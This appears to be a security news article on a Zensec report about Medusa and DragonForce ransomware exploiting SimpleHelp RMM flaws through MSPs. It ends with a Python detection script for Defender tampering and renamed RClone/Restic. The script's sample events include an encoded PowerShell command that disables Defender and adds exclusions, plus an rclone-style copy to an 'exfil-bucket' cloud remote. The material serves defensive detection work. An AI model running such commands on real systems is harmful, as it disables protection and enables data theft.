A new report from Zensec has exposed a critical vulnerability in the IT supply chain, detailing how two major Ransomware-as-a-Service (RaaS) groups, Medusa and DragonForce, are actively exploiting unpatched vulnerabilities in the SimpleHelp Remote Monitoring and Management (RMM) platform. This platform, widely trusted by Managed Service Providers (MSPs), became the initial access vector, granting attackers powerful, SYSTEM-level privileges to compromise numerous downstream customer environments.
The campaigns, uncovered in early 2025, leveraged a trio of flaws—CVE-2024-57726, CVE-2024-57727, and CVE-2024-57728—to pivot from compromised RMM servers into victim networks with “minimal friction.”
In the first quarter of 2025, Medusa ransomware operators launched a wave of coordinated attacks against UK organisations through compromised MSPs.
Once inside, the Medusa operators deployed PDQ Inventory and PDQ Deploy utilities — typically used for network-wide software management — to distribute and execute ransomware payloads such as Gaze.exe or REDACTED.exe.
“PDQ Deploy was leveraged to push and run base64-encoded PowerShell commands that disabled or altered Microsoft Defender and added Defender exclusions.”
The ransomware encrypted files with the extension “.MEDUSA”, leaving ransom notes titled “!!!READ_ME_MEDUSA!!!.txt” across infected systems. In roughly half of the incidents, operators also exfiltrated sensitive data using RClone, renamed as lsp.exe, to avoid detection.
Zensec notes that Medusa’s operations follow a double-extortion model, hosting victims’ stolen data on a dark web leak site and promoting proof-of-life packs via Telegram channels.
Zensec researchers further discovered that Medusa masqueraded as a faux cybersecurity news outlet:
“The group pretended to be a cyber security news site, publishing videos documenting the leaks… sometimes as long as 20 minutes.”
By mid-2025, a separate campaign attributed to the DragonForce Ransomware-as-a-Service (RaaS) group emerged, following a nearly identical intrusion vector.
The DragonForce operators also exploited unpatched SimpleHelp instances to gain SYSTEM-level access, then established persistence using AnyDesk and new local admin accounts. In a notable twist, they used Restic, an open-source backup tool, to exfiltrate data — effectively performing “unscheduled off-site backups” to attacker-controlled cloud storage.
Zensec analysts traced the exfiltration to Wasabi cloud storage endpoints, often seen in enterprise backup configurations.
Encrypted files carried the extension “.dragonforce_encrypted”, and ransom notes named “readme.txt” contained instructions to contact the group via TOX ID chat, with filenames obfuscated by random character strings.
As with Medusa, DragonForce maintains a dark web data leak site and public-facing blog where victim data is posted in staged releases, following the double-extortion pattern.
Zensec’s findings highlight the critical supply-chain risk posed by compromised RMM software, warning that unpatched vendor tools can grant adversaries deep lateral access across multiple customer environments.
The firm advises immediate patching of SimpleHelp servers and recommends that MSPs enforce strict access controls, continuous monitoring, and role-based privilege segmentation.
Additionally, organisations should review all RMM tool telemetry, PowerShell execution logs, and unusual outbound transfers to cloud storage providers.
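The review the report recommends can be partly automated. The script below is an added example written for this page, not Zensec's tooling or anything from the report: it takes process-creation records of the shape an EDR or Sysmon Event ID 1 would provide, decodes PowerShell `-EncodedCommand` payloads (base64 over UTF-16LE), flags the Defender-weakening cmdlets the report describes, flags encoded PowerShell spawned by a software-deployment tool, and looks for RClone or Restic running under another name. The field names, the three sample events, the parent path and the regular expressions are assumptions and heuristics constructed for the example; a renamed Go binary such as rclone often carries no PE version information, so the code falls back to the shape of the command line rather than relying on `OriginalFileName` alone.

```python
import base64
import re
from typing import Dict, List


def encode_powershell(script: str) -> str:
    """Encode a script the way PowerShell's -EncodedCommand expects it
    (UTF-16LE, then base64). Used here only to build constructed samples."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# PowerShell accepts any unambiguous prefix of -EncodedCommand; the short
# forms most often seen in command lines are -e, -ec and -enc.
_ENCODED_ARG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

# Defender tampering described in the report: disabling protection features
# and adding exclusions through the Defender PowerShell cmdlets (heuristics).
_DEFENDER_TAMPER = [
    re.compile(r"Set-MpPreference\b.*-Disable\w+\s+\$?true", re.IGNORECASE),
    re.compile(r"Add-MpPreference\b.*-Exclusion(?:Path|Process|Extension)\b", re.IGNORECASE),
    re.compile(r"(?:Stop-Service|sc(?:\.exe)?\s+stop)\b.*WinDefend", re.IGNORECASE),
]

# Exfiltration tools named in the report. A renamed copy keeps its PE
# OriginalFileName only if the binary carries version info; rclone and restic
# are Go builds that often do not, so the command-line shape is checked too.
_KNOWN_EXFIL_TOOLS = {"rclone.exe", "restic.exe"}
# rclone style: "<verb> <local path> <remote>:<bucket>", excluding drive letters
_RCLONE_LIKE = re.compile(r"\b(?:copy|sync|move)\s+\S+\s+(?![A-Za-z]:\\)\S+:", re.IGNORECASE)
# restic style: "-r <backend>:<repo> ... backup"
_RESTIC_LIKE = re.compile(r"-r\s+(?:s3|b2|azure|gs|sftp|rest|rclone):\S+.*\bbackup\b", re.IGNORECASE)


def decode_encoded_command(cmdline: str) -> str:
    """Return the decoded -EncodedCommand payload, or '' if none is present."""
    m = _ENCODED_ARG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def scan(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Apply the heuristics to process-creation events (dicts with image,
    parent, cmdline and original_file_name) and return a list of findings."""
    findings = []
    for ev in events:
        image = ev["image"].rsplit("\\", 1)[-1].lower()
        cmdline = ev["cmdline"]
        decoded = decode_encoded_command(cmdline)
        # Check the literal command line and, if present, the decoded payload.
        for text in (cmdline, decoded):
            if text and any(p.search(text) for p in _DEFENDER_TAMPER):
                findings.append({"rule": "defender_tampering", "image": ev["image"],
                                 "detail": text.strip()})
                break
        # Encoded PowerShell launched by a deployment tool (PDQ in the report).
        if decoded and "pdq" in ev.get("parent", "").lower():
            findings.append({"rule": "deploy_tool_encoded_powershell",
                             "image": ev["image"], "detail": ev["parent"]})
        orig = ev.get("original_file_name", "").lower()
        if (orig in _KNOWN_EXFIL_TOOLS and orig != image) or (
            image not in _KNOWN_EXFIL_TOOLS
            and (_RCLONE_LIKE.search(cmdline) or _RESTIC_LIKE.search(cmdline))
        ):
            findings.append({"rule": "renamed_exfil_tool", "image": ev["image"],
                             "detail": cmdline})
    return findings


# Constructed sample telemetry (not from the report), including an
# illustrative parent path for the deployment tool.
SAMPLE_EVENTS = [
    {   # deployment runner launching encoded PowerShell that weakens Defender
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "parent": r"C:\Program Files (x86)\Admin Arsenal\PDQ Deploy\PDQDeployRunner-1.exe",
        "cmdline": "powershell.exe -NoP -W Hidden -enc " + encode_powershell(
            "Set-MpPreference -DisableRealtimeMonitoring $true; "
            "Add-MpPreference -ExclusionPath 'C:\\Windows\\Temp'"),
        "original_file_name": "PowerShell.EXE",
    },
    {   # RClone renamed to lsp.exe copying a staging folder to a cloud remote
        "image": r"C:\ProgramData\lsp.exe",
        "parent": r"C:\Windows\System32\cmd.exe",
        "cmdline": r"lsp.exe copy C:\ProgramData\staging wasabi:exfil-bucket --transfers 8",
        "original_file_name": "",
    },
    {   # ordinary administrative PowerShell; should produce no finding
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "parent": r"C:\Windows\explorer.exe",
        "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1",
        "original_file_name": "PowerShell.EXE",
    },
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f['rule']:32} {f['image']}\n    {f['detail']}")
```

The regular expressions are deliberately narrow so the example stays readable; in production the same checks belong in the SIEM or EDR query language, and the encoded-command decoding is the piece most worth keeping, since pattern matching on the raw command line sees only base64.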